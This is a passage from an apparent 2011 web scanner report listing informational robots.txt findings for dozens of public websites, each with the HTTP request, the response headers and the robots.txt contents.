Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jobinfo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7l PHP/5.2.6 mod_jk/1.2.23
Last-Modified: Thu, 07 May 2009 01:09:53 GMT
ETag: "92bab-d7-469482b5e3a40"
Accept-Ranges: bytes
Content-Length: 215
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /public/update_applicant.lasso
Disallow: /public/email_description.lasso
Disallow: /public/email_comment.lasso
Disallow: /public/job_notifier.lasso
Disallow: /public/send_to_cl
...[SNIP]...

26.571. http://www.johnbridge.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.johnbridge.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.johnbridge.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 20 Aug 2008 00:49:36 GMT
ETag: "6f0e1e-17-454d99416c800"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.572. http://www.jokesnjokes.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jokesnjokes.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jokesnjokes.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:55 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Sat, 30 Oct 2010 06:21:00 GMT
ETag: "b4ed9467-3a-493cf94338c19"
Cache-Control: max-age=14400, public
Expires: Tue, 03 May 2011 14:15:17 GMT
Content-Length: 58
Accept-Ranges: bytes
Age: 2618


User-agent: *
Disallow:

26.573. http://www.journalinquirer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.journalinquirer.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.journalinquirer.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Tue, 03 May 2011 10:31:16 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=4999
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: journalinquirer.com
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

26.574. http://www.journeyfinder.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.journeyfinder.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.journeyfinder.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:21 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://journeyfinder.net/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.575. http://www.juicing-for-health.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.juicing-for-health.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.juicing-for-health.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:40 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.juicing-for-health.com/qEIm3A2X.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /d
...[SNIP]...

26.576. http://www.jumeirah.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jumeirah.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jumeirah.com

Response

HTTP/1.1 200 OK
Set-Cookie: AlteonP=ad0a051bad0a5b9cbaeeba89; path=/
Content-Length: 254
Content-Type: text/plain
Content-Location: http://www.jumeirah.com/robots.txt
Last-Modified: Sun, 12 Apr 2009 13:51:00 GMT
Accept-Ranges: bytes
ETag: "03a40b675bbc91:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:27:09 GMT
Connection: close

User-agent: *
Disallow: /*.rotate_config$
Disallow: /*.gallery_config$
Disallow: /*.activities_config$
Disallow: /*.resorts_config$
Disallow: /*.sd_video_config$
Disallow: /*.flv$
Disallow: /*.
...[SNIP]...

26.577. http://www.jumptovids.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jumptovids.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jumptovids.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 10:22:03 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 19 Apr 2007 23:49:38 GMT
ETag: "2e88053-52-42e7fdb12a880"
Accept-Ranges: bytes
Content-Length: 82

# /robots.txt file for http://jumptovids.com/

User-agent: *
Disallow: /st/st.php

26.578. http://www.justgiving.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.justgiving.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justgiving.com

Response

HTTP/1.1 200 OK
Content-Length: 568
Content-Type: text/plain
Last-Modified: Fri, 25 Feb 2011 12:18:08 GMT
Accept-Ranges: bytes
ETag: "32ab2d10e6d4cb1:95c1"
Server: Microsoft-IIS/6.0
server: 192.168.110.247
X-Powered-By: ASP.NET
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 03 May 2011 11:29:56 GMT
Connection: close

...User-agent: *
Sitemap: /sitemap/index
Disallow: /sophie-appeal_static/
Disallow: /user/23001491
Disallow: /user/23664139
Disallow: /1234walk500
Disallow: /Sarah-Gildroy
Disallow: /bronands
...[SNIP]...

26.579. http://www.justsayhi.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.justsayhi.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justsayhi.com

Response

HTTP/1.1 200 OK
Server: nginx/0.5.17
Date: Tue, 03 May 2011 10:47:48 GMT
Content-Type: text/plain
Content-Length: 123
Last-Modified: Tue, 15 Jun 2010 19:56:21 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-Agent: *
Allow: /

26.580. http://www.k1speed.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.k1speed.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.k1speed.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 19 Apr 2011 17:33:15 GMT
ETag: "659405-1aa-4a148e72c4cc0"
Accept-Ranges: bytes
Content-Length: 426
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes/classic
Disallow: /wp-content/themes/
...[SNIP]...

26.581. http://www.kalpoint.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kalpoint.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kalpoint.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 21 May 2010 13:52:28 GMT
ETag: "1fc0002-22-4871b006f3f00"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /.
Allow: /

26.582. http://www.kampsight.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kampsight.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kampsight.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8d PHP/5.2.9
Last-Modified: Fri, 08 Feb 2008 21:38:30 GMT
ETag: "2ff97d-130-694a2180"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.583. http://www.kawasakipartsnation.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kawasakipartsnation.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kawasakipartsnation.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 18 Apr 2011 21:13:53 GMT
Accept-Ranges: bytes
ETag: "6028f85dfecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:48:20 GMT
Connection: close
Content-Length: 460

User-agent: ShopWiki
Disallow: /
User-agent: IRLbot
Disallow: /
User-agent: NextGenSearchBot
Disallow: /
User-Agent: OmniExplorer_Bot
Disallow: /
User-Agent: twiceler
Disallow: /
User-Agent:
...[SNIP]...

26.584. http://www.kbhgames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kbhgames.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kbhgames.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Fri, 25 Jun 2010 22:50:06 GMT
ETag: "12d5dc5-a0-489e2979b6380"
Accept-Ranges: bytes
Content-Length: 160
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /rating/
Disallow: /report/
Disallow: /swf/
Disallow: /img/
Disallow: /admin/
Disallow: /test/

Sitemap: http://kbhgames.com/sitemap.xml

26.585. http://www.keh.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.keh.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keh.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Nov 2010 19:32:34 GMT
Accept-Ranges: bytes
ETag: "0b5cd5aa082cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 1.7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:45:23 GMT
Connection: close
Content-Length: 63

User-agent: *
Disallow: /admin/
Disallow: /user_homepage.aspx

26.586. http://www.kellogg.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kellogg.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kellogg.edu

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 04 Jan 2011 12:39:23 GMT
Accept-Ranges: bytes
ETag: "bbbd7a6acaccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:35:55 GMT
Connection: close
Content-Length: 2666

# robots.txt for http://www.kellogg.edu/

User-agent: *
Disallow: /_private/
Disallow: /_vti_cnf/
Disallow: /_vti_log/
Disallow: /_vti_pvt/
Disallow: /_vti_script/
Disallow: /cgi-bin/
Disal
...[SNIP]...

26.587. http://www.kencove.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kencove.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kencove.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 53
Connection: close
Content-Type: text/html

User-agent: *
Disallow: /fence/freebook.php
Allow: /

26.588. http://www.kewego.fr/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kewego.fr
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kewego.fr

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "57997"
Last-Modified: Tue, 27 Nov 2007 09:14:38 GMT
Content-Length: 95
Connection: close
Date: Tue, 03 May 2011 11:22:32 GMT
Server: lighttpd

User-agent: *

Disallow: /tos/
Disallow: /contact/
Disallow: /upload/
Disallow: /register/

26.589. http://www.keystonecountrystore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.keystonecountrystore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keystonecountrystore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:55:51 GMT
Server: Apache
Last-Modified: Mon, 13 Jul 2009 16:05:09 GMT
ETag: "89c0dd-1b-46e987c757740"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

26.590. http://www.keytrain.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.keytrain.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keytrain.com

Response

HTTP/1.1 200 OK
Content-Length: 173
Content-Type: text/plain
Last-Modified: Fri, 17 Sep 2010 15:39:52 GMT
Accept-Ranges: bytes
ETag: "ebbb2917e56cb1:6bc"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:59:34 GMT
Connection: close

User-agent: *
Disallow: /Files/
Disallow: /support/
Disallow: /profiles/
Disallow: /careerskills/
Disallow: /search/
Disallow: /init/
Disallow: /includes/
Disallow: /error/

26.591. http://www.keywordspy.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.keywordspy.co.uk
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keywordspy.co.uk

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:21:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: PREF=ID=838598219&CID=0&REM=F&CS=791532020413314&CQ=0; domain=.keywordspy.co.uk; expires=Mon, 03-May-2021 10:21:30 GMT; path=/
Set-Cookie: PREF=ID=838598219&CID=0&REM=F&CS=791532020413314&CQ=0; domain=.keywordspy.co.uk; expires=Mon, 03-May-2021 10:21:30 GMT; path=/
Set-Cookie: PREF=ID=838598219&CID=0&REM=F&CS=791532020413314&CQ=0; domain=.keywordspy.co.uk; expires=Mon, 03-May-2021 10:21:30 GMT; path=/
Set-Cookie: PREF=ID=838598219&CID=0&REM=F&CS=791532020413314&CQ=0; domain=.keywordspy.co.uk; expires=Mon, 03-May-2021 10:21:30 GMT; path=/
Set-Cookie: PREF=ID=838598219&CID=0&REM=F&CS=791532020413314&CQ=0; domain=.keywordspy.co.uk; expires=Mon, 03-May-2021 10:21:30 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 236

User-agent: *
Disallow: /research/search.aspx
Disallow: /research/tab.aspx
Disallow: /research/exportFiles.aspx
Disallow: /research/exportfiles.aspx
Disallow: /overview/thumbnail.aspx
Disallow:
...[SNIP]...

26.592. http://www.khsaa.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.khsaa.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.khsaa.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:08 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Feb 2007 20:32:37 GMT
ETag: "6f9f6b-ab-f6fa340"
Accept-Ranges: bytes
Content-Length: 171
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /officials/private/
Disallow: /schools/private/
Disallow: /forms/private/
Disallow: /football/private/

26.593. http://www.kicker.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kicker.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kicker.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:30 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.7
Last-Modified: Mon, 05 Jan 2009 04:26:25 GMT
ETag: "1000000011ad8-636-45fb4b1a0d8a8"
Accept-Ranges: bytes
Content-Length: 1590
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.594. http://www.kids-n-fun.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kids-n-fun.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kids-n-fun.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 06 Apr 2006 18:22:08 GMT
Accept-Ranges: bytes
ETag: "088833a759c61:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:06:33 GMT
Connection: close
Content-Length: 34

User-agent: *
Disallow: /legal/

26.595. http://www.kjct8.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kjct8.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kjct8.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 09 Jun 2010 19:15:12 GMT
ETag: "8d3637-138-b99a9000"
Accept-Ranges: bytes
Content-Length: 312
Content-Type: text/plain
Cache-Control: max-age=691
Expires: Tue, 03 May 2011 11:14:41 GMT
Date: Tue, 03 May 2011 11:03:10 GMT
Connection: close
Set-Cookie: alpha=3dce8f18440b0000eee0bf4db5a906008e800200; expires=Fri, 30-Apr-2021 11:03:10 GMT; path=/; domain=.kjct8.com

User-agent: *
Disallow: /print/
Disallow: /404/
Disallow: /tu/

User-agent: Googlebot
Disallow: /search/
Disallow: /print/
Disallow: /404/
Disallow: /cf/
Disallow: /tu/
Disallow: /sh/

Sitemap: http:/
...[SNIP]...

26.596. http://www.klicer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.klicer.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.klicer.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 20 Jul 2010 13:29:17 GMT
ETag: "6fc0226-6a-48bd1ac00c540"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain; charset=UTF-8

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

26.597. http://www.knife-depot.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knife-depot.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.knife-depot.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:05 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 16:43:55 GMT
ETag: "4390151-145-49ccd91c9e8c0"
Accept-Ranges: bytes
Content-Length: 325
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Sitemap: http://www.knife-depot.com/sitemap.xml

User-agent: *
Disallow: /honey/
Disallow: /custom/print-catalog.php
Disallow: /custom/review-product.php
Disallow: /custom/email-a-friend.php
Di
...[SNIP]...

26.598. http://www.kovels.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kovels.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kovels.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 25 Oct 2010 16:30:33 GMT
ETag: "b005cb-20f-4937382debc40"
Accept-Ranges: bytes
Content-Length: 527
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
D
...[SNIP]...

26.599. http://www.kproxy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kproxy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kproxy.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1196262838000"
Last-Modified: Wed, 28 Nov 2007 15:13:58 GMT
Content-Type: text/plain
Content-Length: 36
Date: Tue, 03 May 2011 06:45:28 GMT
Connection: close

User-agent: Fasterfox
Disallow: /

26.600. http://www.kspr.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kspr.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kspr.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8l mod_onsint/1.0
Last-Modified: Wed, 08 Sep 2010 15:17:02 GMT
ETag: "599aff-21-1699780"
ntCoent-Length: 33
Content-Type: text/plain
Cache-Control: private, max-age=299
Date: Tue, 03 May 2011 10:59:17 GMT
Content-Length: 33
Connection: close

User-agent: *
Disallow: /search/

26.601. http://www.kstatecollegian.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kstatecollegian.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kstatecollegian.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:47 GMT
Server: Apache
ETag: W/"26-1294349890000"
Content-Length: 26
Last-Modified: Thu, 06 Jan 2011 21:38:10 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.602. http://www.kswo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kswo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kswo.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:a0e"
Cteonnt-Length: 818
Expires: Tue, 03 May 2011 10:28:27 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 10:28:27 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

26.603. http://www.ktiv.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ktiv.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ktiv.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:ac9"
Cteonnt-Length: 818
Expires: Tue, 03 May 2011 11:42:04 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 11:42:04 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

26.604. http://www.kwqc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kwqc.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kwqc.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:9f2"
Cteonnt-Length: 818
Expires: Tue, 03 May 2011 10:52:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 10:52:35 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

26.605. http://www.kzzp.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kzzp.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kzzp.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
Date: Tue, 03 May 2011 10:16:14 GMT
X-Varnish: 4191224127 4191166257
Age: 222
Connection: close
X-Cache-Server: varnish03

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

26.606. http://www.lacoste.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lacoste.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lacoste.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain; charset=UTF-8
ETag: "12008f-18-51d46580"
Last-Modified: Mon, 03 Aug 2009 15:21:10 GMT
Accept-Ranges: bytes
Server: Apache
Date: Tue, 03 May 2011 10:43:07 GMT
Connection: close

User-Agent: *
Allow: /

26.607. http://www.lakecompounce.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lakecompounce.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lakecompounce.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:04 GMT
Server: Apache
Last-Modified: Wed, 15 Nov 2006 20:28:36 GMT
ETag: "1d33a0-7c-fab80500"
Accept-Ranges: bytes
Content-Length: 124
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.608. http://www.lakeplace.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lakeplace.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lakeplace.com

Response

HTTP/1.1 200 OK
